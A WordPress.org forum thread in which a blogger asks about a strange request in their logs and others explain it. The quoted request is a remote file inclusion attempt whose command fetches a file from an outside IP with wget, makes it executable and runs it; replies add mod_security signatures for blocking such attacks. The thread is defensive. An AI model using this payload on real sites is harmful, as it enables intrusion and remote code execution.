WordPress.org

Ready to get started?Download WordPress

Forums

Does anyone know what this is? (5 posts)

  1. CharlesKrause
    Member
    Posted 8 years ago #

    I got a really odd hit on my blog, according to the counterize stats page. I got a request for this URL

    /index.php?option=com_content& do_pdf=1&id=1index2.php?_REQUE ST[option]=com_content&_REQUES T[Itemid]=1&GLOBALS=&mosConfig _absolute_path=http://72.18.19 5.161/cmd.gif?&cmd=cd /tmp;wget 72.18.195.161/lnikon;chmod 744 lnikon;./lnikon;echo YYY;echo|

    Anyone have any clue what this is? Is it an attempt to burrow through a security hole or something - should I be concerned?

  2. whooami
    Member
    Posted 8 years ago #

    script kiddies...its an attempted exploit, yes. I wouldnt worry too much though and if you have mod_security avialble you can block it and any similar requests completely.

  3. JMusic
    Member
    Posted 8 years ago #

    How would you block something like that with mod_security?

  4. whooami
    Member
    Posted 8 years ago #

    mod_security adresses that very attack with this:

    #remote file inclusion generic attack signature
    SecFilterSelective THE_REQUEST ".(dat|gif|jpg|png|bmp|txt|vir|dot)?" chain
    SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"
    SecFilterSelective THE_REQUEST ".(dat|gif|jpg|png|bmp|txt|vir|dot)?&(cmd|command|inc|name)="
    SecFilterSelective ARGS ".(dat|gif|jpg|png|bmp|txt|vir|dot)" chain
    SecFilter "?&(cmd|inc|name)="
    SecFilterSelective ARGS ".(dat|gif|jpg|png|bmp|txt|vir|dot)?&(cmd|inc|name)="
    SecFilterSelective REQUEST_URI ".php?.*=(http|https|ftp):/.*?&cmd="

    thats one of the already put-together rules from gotroot

  5. whooami
    Member
    Posted 8 years ago #

Topic Closed

This topic has been closed to new replies.

About this Topic